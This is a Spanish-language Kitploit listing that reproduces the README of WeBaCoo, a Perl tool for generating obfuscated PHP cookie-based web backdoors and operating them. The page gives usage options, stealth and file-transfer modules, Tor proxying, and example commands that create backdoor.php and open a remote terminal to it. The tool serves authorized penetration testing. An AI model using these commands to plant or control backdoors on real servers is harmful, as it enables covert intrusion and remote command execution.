Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
WeBaCoo — Script-Kit de puerta trasera web mediante cookies | Kitploit
Herramientas/GitHubGitHub/anestisb/webacoo
Generación de PayloadsSeguridad WebPruebas de PenetraciónComando y ControlRed Teaming
GitHubanestisb/webacoo

WeBaCoo

Script-Kit de puerta trasera web mediante cookies

Ver Repositorio
186424hace 14 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

| | | | | ___ \ / __ \
| | | | | |/ / __ | / / ___ ___
| |/| |/ _ \ ___ / ` | | / _ \ / _ \ \ /\ / __/ |/ / (
| | _/\ () | (_) | / / _
_/ _,|_/_/ _/

root@kitploit:~
 Script-Kit de Cookie Backdoor Web

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

Escrito por: Anestis Bechtsoudis @ bechtsoudis.com Copyright (C) 2011-2012 Anestis Bechtsoudis

Descargo de responsabilidad

La herramienta es solo para fines de prueba y solo puede usarse donde se haya dado un consentimiento estricto. No la use para fines ilegales.

Licencia

Cualquier modificación, cambio o alteración de esta aplicación es aceptable, sin embargo, cualquier publicación pública que utilice este código debe ser aprobada por su creador. Consulte el archivo LICENSE para obtener más información.

Requisitos

  • perl instalado
  • liburi-perl
  • libio-socket-socks-perl

Si no desea instalar "libio-socket-socks-perl" para la función de proxy Tor, comente la línea 25 en webacoo.pl

Uso

webacoo.pl [opciones]

Opciones: -g Generar código backdoor (-o es requerido)

-f FUNCTION Función del sistema PHP a usar FUNCTION 1: system (por defecto) 2: shell_exec 3: exec 4: passthru 5: popen

-o OUTPUT Nombre de archivo de salida del backdoor generado

-r Devolver código backdoor sin ofuscar

-t Establecer conexión "terminal" remota (-u es requerido)

-u URL URL del backdoor

-e CMD Modo de ejecución de un solo comando (-t y -u son requeridos)

-m METHOD Método HTTP a usar (por defecto "GET")

Descargar herramienta

-c C_NAME Nombre de la cookie (por defecto: "M-cookie")

-d DELIM Delimitador (por defecto: nuevo aleatorio por cada solicitud)

-a AGENT User-Agent del encabezado HTTP (por defecto existe)

-p PROXY Usar proxy (tor, ip:puerto o usuario:contraseña:ip:puerto)

-v LEVEL Nivel de verbose LEVEL 0: sin información adicional (por defecto) 1: imprimir encabezados HTTP 2: imprimir encabezados HTTP + datos

-l LOG Registrar actividad en un archivo

-h Mostrar ayuda y salir

update Buscar actualizaciones y aplicarlas si las hay

Módulos de extensión

Desde la versión 0.2.1 se ha agregado soporte para módulos de extensión para proporcionar funcionalidades adicionales a WeBaCoo. Dentro del modo terminal puedes ejecutar 'load' para listar los módulos disponibles e inicializar el deseado de la lista. Escribiendo 'unload' puedes restaurar el modo terminal inicial.

Módulos de extensión disponibles: o mysql-cli Módulo de línea de comandos MySQL o psql-cli Módulo de línea de comandos Postgres o upload Módulo de subida de archivos mediante HTTP Post o download Módulo de descarga de archivos usando salida estándar a través de 'od' y 'xxd' o stealth Módulo de sigilo mejorado mediante manejo de .htaccess

Ejemplos

  1. Crear backdoor ofuscado 'backdoor.php' con configuración predeterminada ./webacoo.pl -g -o backdoor.php

  2. Crear backdoor sin ofuscar 'raw-backdoor.php' usando la función 'passthru' ./webacoo.pl -g -o raw-backdoor.php -f 4 -r

  3. Establecer conexión "terminal" con el host remoto usando la configuración predeterminada ./webacoo.pl -t -u http://127.0.0.1/backdoor.php

  4. Establecer conexión "terminal" con el host remoto configurando algunos argumentos ./webacoo.pl -t -u http://127.0.0.1/backdoor.php -c "Test-Cookie" -d "TtT"

  5. Establecer conexión "terminal" con el host remoto a través de un proxy HTTP local ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p 127.0.0.1:8080

  6. Establecer conexión "terminal" con el host remoto a través de un proxy HTTP con autenticación básica ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p user:password:10.0.1.8:3128

  7. Establecer conexión "terminal" con el host remoto a través de Tor y registrar actividad ./webacoo.pl -t -u http://example.com/backdoor.php -p tor -l webacoo_log.txt